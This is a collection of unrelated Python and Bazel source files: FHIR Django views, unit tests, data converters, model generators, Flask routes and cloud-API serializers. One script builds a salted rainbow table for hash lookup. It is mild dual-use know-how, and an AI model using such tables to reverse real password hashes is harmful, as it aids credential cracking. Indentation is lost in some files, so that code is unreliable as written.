                  token={'access_token': token, 'token_type': 'Bearer'})
    urls = build_fhir_urls(patient_id)
    response = requests.get(urls['eob'], auth=auth)
    if response.status_code in (200, 404):
        payload = response.json()
        if payload:
            content = json.dumps(payload, indent=4)
        else:
            content = {'error': 'problem reading content.'}
    else:
        # Robustness fix: the original called response.json() here, which
        # raises ValueError on a non-JSON error body. Use the raw body, as
        # the other views in this module do.
        content = response.content
    context['remote_status_code'] = response.status_code
    context['remote_content'] = content
    return render(request, 'bbof.html', context)
@login_required
def bbof_get_coverage(request, patient_id=None):
    """Fetch the Coverage search for a patient and render it."""
    context = {'name': 'Blue Button on FHIR'}
    # first we get the token used to login
    token = request.user.social_auth.get(provider='oauth2io').access_token
    auth = OAuth2(settings.SOCIAL_AUTH_OAUTH2IO_KEY,
                  token={'access_token': token, 'token_type': 'Bearer'})
    urls = build_fhir_urls(patient_id)
    response = requests.get(urls['coverage'], auth=auth)
    if response.status_code in (200, 404):
        payload = response.json()
        if payload:
            content = json.dumps(payload, indent=4)
        else:
            content = {'error': 'problem reading content.'}
    else:
        # Robustness fix: response.json() here would raise on a non-JSON
        # error body; use the raw body like the sibling views.
        content = response.content
    context['remote_status_code'] = response.status_code
    context['remote_content'] = content
    return render(request, 'bbof.html', context)
@login_required
def bbof_get_fhir(request, resource_type, patient):
    """Call an arbitrary FHIR resource endpoint and render the response."""
    context = {'name': 'Blue Button on FHIR'}
    # first we get the token used to login
    token = request.user.social_auth.get(provider='oauth2io').access_token
    auth = OAuth2(settings.SOCIAL_AUTH_OAUTH2IO_KEY,
                  token={'access_token': token, 'token_type': 'Bearer'})
    # next we call the remote api.
    # NOTE(review): the query value is a hard-coded sandbox id and `patient`
    # is used as the query *parameter name* — confirm this is intentional.
    endpoint = '/v1/fhir/%s/?%s=59b99cd030c49e0001481f44&_format=json' % (
        resource_type, patient)
    url = urljoin(
        getattr(
            settings,
            'OAUTH2IO_HOST',
            "https://sandbox.bluebutton.cms.gov"), endpoint)
    # Dropped the stray print(url); the debug log below already records it.
    logging.debug("calling FHIR Service with %s" % url)
    response = requests.get(url, auth=auth)
    if response.status_code in (200, 404):
        payload = response.json()
        if payload:
            content = json.dumps(payload, indent=4)
        else:
            content = {'error': 'problem reading content.'}
    else:
        # The original's 403 and <=500 branches built error dicts but
        # immediately overwrote them with response.content, so every error
        # path effectively returned the raw body; the dead stores are removed.
        content = response.content
    context['remote_status_code'] = response.status_code
    context['remote_content'] = content
    # Bug fix: was `ontext['patient'] = patient`, a NameError at runtime.
    context['patient'] = patient
    return render(request, 'bbof.html', context)
|
from functools import reduce
from rnnr import Event
from rnnr.attachments import LambdaReducer
def test_ok(runner):
    """LambdaReducer folds batch results stored under the default 'output' key."""
    outputs = [4, 2, 1, 5, 6]
    batches = range(len(outputs))

    @runner.on(Event.BATCH)
    def on_batch(state):
        state["output"] = outputs[state["batch"]]

    reducer = LambdaReducer("product", lambda a, b: a * b)
    reducer.attach_on(runner)
    runner.run(batches)

    expected = reduce(lambda a, b: a * b, outputs)
    assert reducer.name == "product"
    assert runner.state["product"] == expected
def test_value(runner):
    """LambdaReducer reads batch results from a custom state key via `value=`."""
    outputs = [4, 2, 1, 5, 6]
    batches = range(len(outputs))

    @runner.on(Event.BATCH)
    def on_batch(state):
        state["value"] = outputs[state["batch"]]

    reducer = LambdaReducer("product", lambda a, b: a * b, value="value")
    reducer.attach_on(runner)
    runner.run(batches)

    expected = reduce(lambda a, b: a * b, outputs)
    assert runner.state["product"] == expected
|
"""
Your task is to find the first element of an array that is not consecutive.
By not consecutive we mean not exactly 1 larger than the previous element of the array.
E.g. If we have an array [1,2,3,4,6,7,8] then 1 then 2 then 3 then 4 are all consecutive but 6 is not, so that's the first non-consecutive number.
If the whole array is consecutive then return None.
The array will always have at least 2 elements and all elements will be numbers.
The numbers will also all be unique and in ascending order.
The numbers could be positive or negative and the first non-consecutive could be either too!
"""
def first_non_consecutive(arr):
    """Return the first element that is not exactly 1 greater than its
    predecessor, or None if the whole array is consecutive.

    The input is assumed ascending with unique elements and len(arr) >= 2.

    Fixes the original end-of-array check ``arr.index(arr[index])``, which
    was O(n) per iteration (O(n^2) overall) and incorrect if the array ever
    contained duplicate values.
    """
    for prev, cur in zip(arr, arr[1:]):
        if cur - prev != 1:
            return cur
    return None
|
import apsw
from time import time
from itertools import product
from CONFIGURATION import *
from hasher import *
# Alphabet for the plaintext space: lowercase letters plus space.
letter = "abcdefghijklmnopqrstuvwxyz "

print("\nCreating New Rainbow Table\n\nEnter Security Code:")
securecode = input()

# Build the table in an in-memory database first; it is dumped to disk in
# one backup pass at the end.
memdb = apsw.Connection(":memory:")
memdbc = memdb.cursor()
memdbc.execute("CREATE TABLE IF NOT EXISTS tb (hash text, value text)")

print("\n\n\nStarting now.\n\n")
starttime = time()

print("[1/3] Creating Rainbowtable")
# Every string of length `blobsize` over the alphabet. NOTE(review):
# `blobsize` comes from CONFIGURATION and `hash` from hasher via star
# imports; `hash` shadows the builtin — confirm.
rainbowtable = [''.join(i) for i in product(letter, repeat=blobsize)]
print("[1/3] Done Creating Rainbowtable")

print("[2/3] Hashing")
# Hash the first 100000 entries, timing them to estimate the total run time.
starttimeblob = time()
for i in rainbowtable[:100000]:
    memdbc.execute('INSERT INTO tb VALUES (?,?)', (hash(i + securecode), i))
endtimeblob = time()
timeusedblob = endtimeblob - starttimeblob
# Typo fix: "Estemated" -> "Estimated".
print("Estimated Solve Time: " + str(round(timeusedblob / 100000 * (pow(len(letter), blobsize)))) + " seconds")
for i in rainbowtable[100000:]:
    memdbc.execute('INSERT INTO tb VALUES (?,?)', (hash(i + securecode), i))
print("[2/3] Hashing Done")

print("[3/3] Exporting to file")
diskdb = apsw.Connection(securecode + ".db")
with diskdb.backup("main", memdb, "main") as backup:
    backup.step()  # copy whole database in one go
print("[3/3] Exported")
memdbc.close()
memdb.close()

endtime = time()
timeused = endtime - starttime
totalhashes = pow(len(letter), blobsize)

# Display Result (typo fixes: "Procces" -> "Process", "Calcuated" -> "Calculated")
print("\n\n\n\n\n\n--------------------------------------------")
print("Process Completed")
print("Hashes Calculated: " + str(totalhashes))
print("Speed: " + str(round(totalhashes / timeused)) + " per second")
if timeused > 60:
    if timeused > 3600:
        print("Time: " + str(round((timeused / 3600), 2)) + " hours")
    else:
        print("Time: " + str(round((timeused / 60), 2)) + " min")
else:
    print("Time: " + str(round((timeused), 4)) + " sec")
print("--------------------------------------------\n\n\n")
|
"""
The yelp dataset *business.json file has lat and long as a separate keys, however MongoDB wants
them to be under the same key to create a 2D index
The data generated here can be imported as:
mongoimport --db yelpdata --collection business --jsonArray --file out.json
"""
import json
def main(f, o):
    """
    Fix JSON input 'f' and save it as a JSON Array to output file 'o'.

    Each input line is one business record; only _id, name, loc (as
    [longitude, latitude], the single key MongoDB needs for a 2D index) and
    stars are kept.

    :param f: input file path as a string
    :param o: output file path as a string
    :return: None
    """
    docs = []
    # Stream line by line instead of reading the whole file into memory.
    with open(f) as infile:
        for line in infile:
            record = json.loads(line)
            docs.append(json.dumps({
                '_id': record['business_id'],
                'name': record['name'],
                'loc': [record['longitude'], record['latitude']],
                'stars': record['stars'],
            }))
    # Context manager guarantees the output file is closed even on error
    # (the original leaked the handle if a write raised).
    with open(o, 'w') as out:
        out.write('[' + ',\n'.join(docs) + ']')
if __name__ == '__main__':
    # Paths are relative to the invocation's working directory.
    main('./yelp_academic_dataset_business.json', './out.json')
|
# Copyright (C) 2018-2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
#
# pool2d paddle model generator
#
import numpy as np
from save_model import saveModel
import sys
def paddle_dropout(name : str, x, p, paddle_attrs):
    """Build, run and save a static-graph paddle dropout model.

    `paddle_attrs` supplies the 'training' flag and dropout 'mode'.
    Returns the network output computed on input `x`.
    """
    import paddle
    paddle.enable_static()

    main_prog = paddle.static.Program()
    startup_prog = paddle.static.Program()
    with paddle.static.program_guard(main_prog, startup_prog):
        node_x = paddle.static.data(name='x', shape=x.shape, dtype='float32')
        out = paddle.nn.functional.dropout(
            x=node_x, p=p,
            training=paddle_attrs['training'],
            mode=paddle_attrs['mode'])

        exe = paddle.static.Executor(paddle.static.cpu_places(1)[0])
        # Run the startup program so parameter initializers execute.
        exe.run(paddle.static.default_startup_program())
        outs = exe.run(feed={'x': x}, fetch_list=[out])

        saveModel(name, exe, feedkeys=['x'], fetchlist=[out], inputs=[x],
                  outputs=[outs[0]], target_dir=sys.argv[1])

    return outs[0]
def main():
    """Generate dropout test models for both inference scaling modes."""
    prob = 0.5
    data = np.random.random(size=(3, 10, 3, 7)).astype('float32')
    configs = [
        ("dropout", {'training': False, 'mode': "downscale_in_infer"}),
        ("dropout_upscale_in_train", {'training': False, 'mode': "upscale_in_train"}),
    ]
    for model_name, attrs in configs:
        paddle_dropout(model_name, data, prob, attrs)
if __name__ == "__main__":
main() |
# $Id$
#
# @rocks@
# Copyright (c) 2000 - 2010 The Regents of the University of California
# All rights reserved. Rocks(r) v5.4 www.rocksclusters.org
# https://github.com/Teradata/stacki/blob/master/LICENSE-ROCKS.txt
# @rocks@
#
# $Log$
# Revision 1.4 2010/09/07 23:52:54 bruno
# star power for gb
#
# Revision 1.3 2010/05/20 00:31:45 bruno
# gonna get some serious 'star power' off this commit.
#
# put in code to dynamically configure the static-routes file based on
# networks (no longer the hardcoded 'eth0').
#
# Revision 1.2 2009/05/01 19:06:57 mjk
# chimi con queso
#
# Revision 1.1 2009/03/13 20:34:19 mjk
# - added list.appliance.route
# - added list.os.route
#
import stack.commands
class Command(stack.commands.list.appliance.command):
    """
    List the routes for a given appliance type.
    <arg optional='1' type='string' name='appliance' repeat='1'>
    Zero, one or more appliance names. If no appliance names are supplied,
    the routes for all the appliances are listed.
    </arg>
    """

    def run(self, params, args):
        # Emit one output row per configured route for each requested appliance.
        self.beginOutput()
        for app in self.getApplianceNames(args):
            routes = self.db.select("""r.network, r.netmask, r.gateway,
			r.subnet, r.interface from appliance_routes r, appliances a
			where r.appliance=a.id and a.name=%s""", app)
            for network, netmask, gateway, subnet, interface in routes:
                # Resolve the subnet foreign key to its human-readable name.
                if subnet:
                    subnet_name = self.db.select("""name from subnets where id=%s""",
                        [subnet])[0][0]
                else:
                    subnet_name = None
                # Legacy rows store the literal string 'NULL' for "no interface".
                if interface == 'NULL':
                    interface = None
                self.addOutput(app, (network, netmask, gateway, subnet_name, interface))
        self.endOutput(header=['appliance', 'network', 'netmask', 'gateway',
            'subnet', 'interface' ], trimOwner=0)
|
# Read three burger prices then two drink prices (one int per line) and print
# the price of the cheapest burger + cheapest drink, minus the 50-cent combo
# discount. Comprehensions and min() replace the repetitive append/sort chain;
# input order and output are unchanged.
burger = [int(input()) for _ in range(3)]
drink = [int(input()) for _ in range(2)]
print(min(burger) + min(drink) - 50)
|
from flask import Flask, render_template
app = Flask(__name__)


@app.route('/')
def index():
    """Landing page."""
    return render_template("landing_page.html")


@app.route('/ninjas')
def ninjas():
    """Ninjas page."""
    return render_template("ninjas.html")


@app.route('/dojo')
def dojo():
    """Dojo page."""
    return render_template("dojo.html")


if __name__ == "__main__":
    # Bug fix: guard the dev server so merely importing this module (e.g.
    # from a WSGI server or a test) does not start it.
    app.run(debug=True)
# Copyright 2016 The Closure Rules Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for building JavaScript Protocol Buffers.
"""
load("//closure/compiler:closure_js_library.bzl", "closure_js_library")
def _collect_includes(srcs):
    """Returns protoc -I include paths: the current workspace plus the root of
    every external workspace referenced by an "@"-prefixed src label."""
    includes = ["."]
    for src in srcs:
        if src.startswith("@"):
            include = Label(src).workspace_root
            # `include` is empty for the main workspace; dedupe the rest.
            if include and include not in includes:
                includes.append(include)
    return includes
def closure_js_proto_library(
        name,
        srcs,
        suppress = [],
        add_require_for_enums = 0,
        testonly = None,
        binary = 1,
        import_style = None,
        protocbin = Label("@com_google_protobuf//:protoc"),
        **kwargs):
    """Generates a closure_js_library named `name` from .proto sources.

    A private genrule runs protoc to emit <name>.js plus a descriptor set;
    the generated file is then wrapped in a closure_js_library.
    """
    # Assemble the protoc command line and its --js_out option string.
    cmd = ["$(location %s)" % protocbin]
    js_out_options = ["library=%s,error_on_name_conflict" % name]
    if add_require_for_enums:
        js_out_options += ["add_require_for_enums"]
    if testonly:
        js_out_options += ["testonly"]
    if binary:
        js_out_options += ["binary"]
    if import_style:
        js_out_options += ["import_style=%s" % import_style]
    cmd += ["-I%s" % i for i in _collect_includes(srcs)]
    cmd += ["--js_out=%s:$(@D)" % ",".join(js_out_options)]
    cmd += ["--descriptor_set_out=$(@D)/%s.descriptor" % name]
    cmd += ["$(locations " + src + ")" for src in srcs]
    # Private genrule that actually invokes protoc.
    native.genrule(
        name = name + "_gen",
        srcs = srcs,
        testonly = testonly,
        visibility = ["//visibility:private"],
        message = "Generating JavaScript Protocol Buffer file",
        outs = [name + ".js", name + ".descriptor"],
        tools = [protocbin],
        cmd = " ".join(cmd),
    )
    # Public target: the generated JS compiled as a closure_js_library.
    closure_js_library(
        name = name,
        srcs = [name + ".js"],
        testonly = testonly,
        deps = [
            str(Label("//closure/library/array")),
            str(Label("//closure/protobuf:jspb")),
        ],
        internal_descriptors = [name + ".descriptor"],
        # Generated protobuf JS trips these checks; lenient mode for the rest.
        suppress = suppress + [
            "missingProperties",
            "unusedLocalVariables",
        ],
        lenient = True,
        **kwargs
    )
|
from main.classes.SQLIOHandler import SQLIOHandler
# Bug fix: was `from os import sys`, which only works because os happens to
# import sys internally (a private re-export); import it directly.
import sys

if __name__ == "__main__":
    # alphaAPIHTTPHandler = AlphaAPIHTTPHandler("symbols", "SYMBOL")
    # alphaAPIHTTPHandler.GenerateJsonSymbolOverviewRepository()
    # Load every previously fetched JSON file into the SQL database.
    sQLIOHandler = SQLIOHandler()
    sQLIOHandler.ProcessAllJsonFilesIntoDatabase()
    sys.exit(0)
|
import sys
import matplotlib.pyplot as plt
import numpy as np
# Input produced by the GA training run, and the two output plot paths.
training_data_path = '../resources/training_data.txt'
plot_path_g = '../resources/training_data_g.jpg'
plot_path_t = '../resources/training_data_t.jpg'
# Columns: generation index, wall-clock timestamp, best and average duration.
generations, time_stamps, best_durations, average_durations = np.loadtxt(training_data_path, unpack=True)
# Plot 1: durations versus generation.
plt.title('Training data')
plt.xlabel('generation')
plt.ylabel('duration')
plt.plot(generations, average_durations, label='Average duration', color='k')
plt.plot(generations, best_durations, label='Best duration', color='deepskyblue')
def plot_benchmarks():
    """Overlay horizontal benchmark reference lines (best solution plus 0-30%)
    if a benchmark file name was given on the command line.

    Bug fix: the original reused the module-level `generations` array via
    .fill(), mutating shared data in place and plotting the same array object
    for every line; each reference line now gets its own array.
    """
    # Plot benchmarks if benchmark file specified
    if len(sys.argv) > 1:
        benchmark_path = f'../resources/benchmark_files/{sys.argv[1]}.res'
        with open(benchmark_path, 'r') as f:
            best_solution = float(f.readline().strip())
        for percentile in [0.0, 0.05, 0.1, 0.2, 0.3]:
            level = np.full_like(generations, best_solution * (1 + percentile))
            plt.plot(level, label=str(percentile))
plot_benchmarks()
plt.legend()
plt.savefig(plot_path_g)
plt.close()
# -------------------------------
# Plot 2: durations versus elapsed wall-clock time.
plt.title('Training data')
plt.xlabel('time / (s)')
plt.ylabel('duration')
plt.plot(time_stamps, average_durations, label='Average duration', color='k')
plt.plot(time_stamps, best_durations, label='Best duration', color='deepskyblue')
plt.legend()
plt.savefig(plot_path_t)
plt.close() |
from .CheckCase import CheckCase
from .CheckCommandLineArguments import CheckCommandLineArguments
|
from django.db import models
from drf_yasg import openapi
from rest_framework import serializers
# Common drf-yasg header parameters: the session cookie header(s) that the
# documented endpoints expect.
SessionParameter = [
    openapi.Parameter(
        name='Cookie', in_=openapi.IN_HEADER,
        type=openapi.TYPE_STRING,
        description="Cookie",
        required=True,
        default=""
    ),
    openapi.Parameter(
        name='Cookies', in_=openapi.IN_HEADER,
        type=openapi.TYPE_STRING,
        description="Cookies",
        required=False,
        default=""
    ),
]


class NoneMeta(models.Model):
    # Placeholder model: lets the request-body serializers below subclass
    # ModelSerializer without a real database table (managed = False).
    class Meta:
        managed = False
        db_table = 'NoneMeta'
# --- Configuration / session / project request-body schemas. All use the
# --- NoneMeta placeholder model; `fields` lists the accepted body keys.

class GetConfInfoSerializer(serializers.ModelSerializer):
    key_value = serializers.CharField(required=True)
    class Meta:
        model = NoneMeta
        fields = ["key_value"]


class SessionSerializer(serializers.ModelSerializer):
    username = serializers.CharField(required=True)
    password = serializers.CharField(required=True)
    project_name = serializers.CharField(required=True)
    project_domain_name = serializers.CharField(required=False)
    user_domain_name = serializers.CharField(required=False)
    region = serializers.CharField(required=False)
    class Meta:
        model = NoneMeta
        fields = ["username", "password", "project_name", "project_domain_name",
                  "user_domain_name", 'region']


class ProjectSerializer(serializers.ModelSerializer):
    project_name = serializers.CharField(required=True)
    domain_name = serializers.CharField(required=False)
    class Meta:
        model = NoneMeta
        fields = ['project_name', 'domain_name']


class DeleteProjectSerializer(serializers.ModelSerializer):
    project_name = serializers.CharField(required=True)
    domain_name = serializers.CharField(required=False)
    class Meta:
        model = NoneMeta
        fields = ['project_name', 'domain_name']


class ListProjectSerializer(serializers.ModelSerializer):
    domain_name = serializers.CharField(required=False)
    class Meta:
        model = NoneMeta
        fields = ['domain_name']


class GetProjectSerializer(serializers.ModelSerializer):
    project_name = serializers.CharField(required=True)
    domain_name = serializers.CharField(required=False)
    class Meta:
        model = NoneMeta
        fields = ['project_name', 'domain_name']


class UpdateProjectSerializer(serializers.ModelSerializer):
    project_name = serializers.CharField(required=True)
    description = serializers.CharField(required=True)
    class Meta:
        model = NoneMeta
        fields = ['project_name', 'description']
# --- User and role-assignment request-body schemas.

class UserSerializer(serializers.ModelSerializer):
    name = serializers.CharField(required=True)
    password = serializers.CharField(required=True)
    email = serializers.CharField(required=True)
    default_project = serializers.CharField(required=False)
    domain_name = serializers.CharField(required=False)
    description = serializers.CharField(required=False)
    class Meta:
        model = NoneMeta
        fields = ['name', 'password', 'email',
                  'default_project', 'domain_name',
                  'description']


class ListUserSerializer(serializers.ModelSerializer):
    project_name = serializers.CharField(required=False)
    domain_name = serializers.CharField(required=False)
    class Meta:
        model = NoneMeta
        fields = ['project_name', 'domain_name']


class DeleteUserSerializer(serializers.ModelSerializer):
    user_name = serializers.CharField(required=True)
    class Meta:
        model = NoneMeta
        fields = ['user_name']


class UpdateUserSerializer(serializers.ModelSerializer):
    # `origin_user` names the user to update; the rest are optional new values.
    origin_user = serializers.CharField(required=True)
    name = serializers.CharField(required=False)
    password = serializers.CharField(required=False)
    email = serializers.CharField(required=False)
    default_project = serializers.CharField(required=False)
    domain_id = serializers.CharField(required=False)
    description = serializers.CharField(required=False)
    class Meta:
        model = NoneMeta
        fields = ['origin_user', 'name', 'email', 'domain_id', 'password',
                  'description', 'default_project']


class RoleAssignmentSerializer(serializers.ModelSerializer):
    user = serializers.CharField(required=True)
    project = serializers.CharField(required=True)
    role = serializers.CharField(required=False, default='_member_')
    domain = serializers.CharField(required=False, default='default')
    class Meta:
        model = NoneMeta
        fields = ['user', 'project', 'role', 'domain']
# --- Compute-instance request-body schemas.

class InstanceCreateSerializer(serializers.ModelSerializer):
    name = serializers.CharField(required=True)
    image = serializers.CharField(required=True)
    flavor = serializers.CharField(required=True)
    network_dict = serializers.DictField(required=True)
    class Meta:
        model = NoneMeta
        fields = ['name', 'image', 'flavor', 'network_dict']


class InstanceStopSerializer(serializers.ModelSerializer):
    server_id = serializers.CharField(required=True)
    class Meta:
        model = NoneMeta
        fields = ['server_id']


class InstanceRestartSerializer(serializers.ModelSerializer):
    server_id = serializers.CharField(required=True)
    class Meta:
        model = NoneMeta
        fields = ['server_id']


class InstanceStartSerializer(serializers.ModelSerializer):
    server_id = serializers.CharField(required=True)
    class Meta:
        model = NoneMeta
        fields = ['server_id']


class InstanceDeleteSerializer(serializers.ModelSerializer):
    # Bulk delete: a list of server ids.
    server_id_list = serializers.ListField(required=True)
    class Meta:
        model = NoneMeta
        fields = ['server_id_list']


class InstanceIdSerializer(serializers.ModelSerializer):
    server_id = serializers.CharField(required=True)
    class Meta:
        model = NoneMeta
        fields = ['server_id']
# --- Router and floating-IP request-body schemas.

class RouterCreateSerializer(serializers.ModelSerializer):
    router_name = serializers.CharField(required=True)
    class Meta:
        model = NoneMeta
        fields = ['router_name']


class DeleteRouterSerializer(serializers.ModelSerializer):
    router_of_name = serializers.CharField(required=True)
    class Meta:
        model = NoneMeta
        fields = ['router_of_name']


class CreateFloatingIpSerializer(serializers.ModelSerializer):
    contract_number = serializers.CharField(required=False)
    region = serializers.CharField(required=True)
    external_line_type = serializers.CharField(required=True)
    floating_network_id = serializers.CharField(required=True)
    qos_policy_id = serializers.CharField(required=True)
    # Number of floating IPs to allocate.
    count = serializers.IntegerField(required=True)
    class Meta:
        model = NoneMeta
        fields = ["contract_number", "region", "external_line_type", "floating_network_id", "qos_policy_id", "count"]


class DeleteFloatingIpSerializer(serializers.ModelSerializer):
    floating_ip_id_list = serializers.ListField(required=True)
    class Meta:
        model = NoneMeta
        fields = ['floating_ip_id_list']


class FloatingIpQuotasSetSerializer(serializers.ModelSerializer):
    qos_policy_id = serializers.CharField(required=True)
    floating_ip_id = serializers.CharField(required=True)
    class Meta:
        model = NoneMeta
        fields = ['qos_policy_id', 'floating_ip_id']


class AddFloatingIptoServerSerializer(serializers.ModelSerializer):
    instance_id = serializers.CharField(required=True)
    floating_ip_id = serializers.CharField(required=True)
    fixed_address = serializers.CharField(required=True)
    class Meta:
        model = NoneMeta
        fields = ['instance_id', 'floating_ip_id', "fixed_address"]


class DetachFloatingIptoServerSerializer(serializers.ModelSerializer):
    instance_id = serializers.CharField(required=True)
    floating_ip_id = serializers.CharField(required=True)
    class Meta:
        model = NoneMeta
        fields = ['instance_id', 'floating_ip_id']
# --- Network / subnet request-body schemas.

class AddRouterInterfaceSerializer(serializers.ModelSerializer):
    router_id = serializers.CharField(required=True)
    subnet_id = serializers.CharField(required=True)
    class Meta:
        model = NoneMeta
        fields = ['router_id', 'subnet_id']


class SetRouterGatewaySerializer(serializers.ModelSerializer):
    router_id = serializers.CharField(required=True)
    external_id = serializers.CharField(required=True)
    class Meta:
        model = NoneMeta
        fields = ['router_id', 'external_id']


class CreateNetworksSerializer(serializers.ModelSerializer):
    network_name = serializers.CharField(required=True)
    class Meta:
        model = NoneMeta
        fields = ['network_name']


class CreateTenantSubnetSerializer(serializers.ModelSerializer):
    tenant_network_name = serializers.CharField(required=True)
    tenant_network_cidr = serializers.CharField(required=True)
    enable_dhcp_server = serializers.BooleanField(required=True)
    gateway = serializers.CharField(required=True)
    disable_gateway_ip = serializers.BooleanField(required=True)
    subnet_name = serializers.CharField(required=True)
    dns_name_server = serializers.ListField(required=True)
    class Meta:
        model = NoneMeta
        fields = ['tenant_network_name', 'tenant_network_cidr', 'enable_dhcp_server',
                  'gateway', 'disable_gateway_ip', 'subnet_name', 'dns_name_server']
class CreateVpcSerializer(serializers.ModelSerializer):
vpc_name = serializers.CharField(required=True)
region = serializers.CharField(required=True)
net_name = serializers.CharField(required=True)
vpc_type = serializers.CharField(required=True)
cidr = serializers.CharField(required=True)
enable_dhcp = serializers.BooleanField(required=False)
gateway_ip = serializers.CharField(required=False)
dns = serializers.ListField(required=False)
class Meta:
model = NoneMeta
fields = ['vpc_name', 'region', 'net_name', 'cidr',
'enable_dhcp', 'gateway_ip', 'dns', 'vpc_type']
class UpdateVpcSerializer(serializers.ModelSerializer):
vpc_id = serializers.IntegerField(required=True)
name = serializers.CharField(required=True)
class Meta:
model = NoneMeta
fields = ['vpc_id', 'name']
class DleleteVpcSerializer(serializers.ModelSerializer):
vpc_ids = serializers.ListField(required=True)
class Meta:
model = NoneMeta
fields = ['vpc_ids']
class ListVpcNetworks(serializers.ModelSerializer):
vpc_id = serializers.IntegerField(required=True)
class Meta:
model = NoneMeta
fields = ['vpc_id']
class AddVpcNetwork(serializers.ModelSerializer):
vpc_id = serializers.IntegerField(required=True)
net_name = serializers.CharField(required=True)
cidr = serializers.CharField(required=True)
enable_dhcp = serializers.BooleanField(required=False)
gateway_ip = serializers.CharField(required=False)
dns = serializers.ListField(required=False)
class Meta:
model = NoneMeta
fields = ['vpc_id', 'net_name', 'cidr',
'enable_dhcp', 'gateway_ip', 'dns']
class UpdateVpcNetwork(serializers.ModelSerializer):
vpc_id = serializers.IntegerField(required=True)
net_id = serializers.CharField(required=True)
net_name = serializers.CharField(required=False)
enable_dhcp = serializers.BooleanField(required=False)
dns = serializers.ListField(required=False)
class Meta:
model = NoneMeta
fields = ['vpc_id', 'net_id', 'net_name',
'enable_dhcp', 'dns']
class DeleteVpcNetwork(serializers.ModelSerializer):
    """Request payload for removing a network from a VPC."""
    vpc_id = serializers.IntegerField(required=True)
    net_id = serializers.CharField(required=True)

    class Meta:
        model = NoneMeta
        fields = ['vpc_id', 'net_id']
class KeypairCreate(serializers.ModelSerializer):
    """Request payload for creating an SSH keypair (public key optional)."""
    name = serializers.CharField(required=True)
    public_key = serializers.CharField(required=False)

    class Meta:
        model = NoneMeta
        fields = ['name', 'public_key']
class KeypairDelete(serializers.ModelSerializer):
    """Request payload for deleting keypairs by name."""
    keypair_name_list = serializers.ListField(required=True)

    class Meta:
        model = NoneMeta
        fields = ['keypair_name_list']
class ProjectIdSerializer(serializers.ModelSerializer):
    """Optional project id filter used by project-scoped endpoints."""
    project_id = serializers.CharField(required=False)

    class Meta:
        model = NoneMeta
        fields = ['project_id']
class FirewallCreate(serializers.ModelSerializer):
    """Request payload for creating a firewall in a region."""
    name = serializers.CharField(required=True)
    enabled = serializers.BooleanField(required=False)
    description = serializers.CharField(required=False)
    region = serializers.CharField(required=True)

    class Meta:
        model = NoneMeta
        fields = ['name', 'enabled', 'description', 'region']
class FirewallRuleListSerializer(serializers.ModelSerializer):
    """Request payload for listing the rules of a firewall."""
    firewall_id = serializers.CharField(required=True)

    class Meta:
        model = NoneMeta
        fields = ['firewall_id']
class FirewallUpdate(serializers.ModelSerializer):
    """Request payload for updating a firewall's name/state/description."""
    firewall_id = serializers.IntegerField(required=True)
    name = serializers.CharField(required=True)
    enabled = serializers.BooleanField(required=False)
    description = serializers.CharField(required=False)

    class Meta:
        model = NoneMeta
        fields = ['firewall_id', 'name', 'enabled',
                  'description']
class FirewallDelete(serializers.ModelSerializer):
    """Request payload for deleting one or more firewalls."""
    firewalls = serializers.ListField(required=True)

    class Meta:
        model = NoneMeta
        fields = ['firewalls']
class FirewallRuleCreate(serializers.ModelSerializer):
    """Request payload for adding a rule to a firewall; all fields required."""
    firewall_id = serializers.CharField(required=True)
    direction = serializers.CharField(required=True)
    action = serializers.CharField(required=True)
    protocol = serializers.CharField(required=True)
    remote_ip = serializers.CharField(required=True)
    remote_port = serializers.CharField(required=True)

    class Meta:
        model = NoneMeta
        fields = ['firewall_id', 'direction', 'action',
                  'protocol', 'remote_ip', 'remote_port']
class FirewallRuleUpdate(serializers.ModelSerializer):
    """Request payload for partially updating an existing firewall rule."""
    firewall_id = serializers.CharField(required=True)
    firewall_rule_id = serializers.CharField(required=True)
    direction = serializers.CharField(required=False)
    action = serializers.CharField(required=False)
    protocol = serializers.CharField(required=False)
    remote_ip = serializers.CharField(required=False)
    remote_port = serializers.CharField(required=False)

    class Meta:
        model = NoneMeta
        fields = ['firewall_id', 'firewall_rule_id', 'direction', 'action',
                  'protocol', 'remote_ip', 'remote_port']
class FirewallRuleDelete(serializers.ModelSerializer):
    """Request payload for deleting rules from a firewall.

    # NOTE(review): `firewall_rule_id` is a ListField despite the singular
    # name — it carries multiple rule ids; renaming would break callers.
    """
    firewall_id = serializers.CharField(required=True)
    firewall_rule_id = serializers.ListField(required=True)

    class Meta:
        model = NoneMeta
        fields = ['firewall_id', 'firewall_rule_id']
class InstanceInterfaceAttachSerializer(serializers.ModelSerializer):
    """Request payload for attaching a network interface to a server."""
    server_id = serializers.CharField(required=True)
    net_id = serializers.CharField(required=True)

    class Meta:
        model = NoneMeta
        fields = ['server_id', 'net_id']
class InstanceInterfaceDetachSerializer(serializers.ModelSerializer):
    """Request payload for detaching one or more ports from a server."""
    server_id = serializers.CharField(required=True)
    port_ids = serializers.ListField(required=True)

    class Meta:
        model = NoneMeta
        fields = ['server_id', 'port_ids']
class CreateLoadBalancersSerializer(serializers.ModelSerializer):
    """Request payload for creating a load balancer on a VIP subnet."""
    vip_subnet_id = serializers.CharField(required=True)
    name = serializers.CharField(required=True)
    listeners = serializers.ListField(required=False)
    admin_state_up = serializers.BooleanField(required=False)
    description = serializers.CharField(required=False)
    flavor_id = serializers.UUIDField(required=False)
    provider = serializers.CharField(required=False)
    tags = serializers.ListField(required=False)
    vip_address = serializers.CharField(required=False)
    vip_network_id = serializers.UUIDField(required=False)
    vip_port_id = serializers.UUIDField(required=False)
    vip_qos_policy_id = serializers.UUIDField(required=False)

    class Meta:
        model = NoneMeta
        fields = ['vip_subnet_id', 'name', 'listeners', 'admin_state_up',
                  'description', 'flavor_id', 'provider', 'tags',
                  'vip_address', 'vip_network_id', 'vip_port_id', 'vip_qos_policy_id']
class UpdateLoadBalancersSerializer(serializers.ModelSerializer):
    """Request payload for updating mutable load-balancer attributes."""
    admin_state_up = serializers.BooleanField(required=False)
    description = serializers.CharField(required=False)
    loadbalancer_id = serializers.UUIDField(required=True)
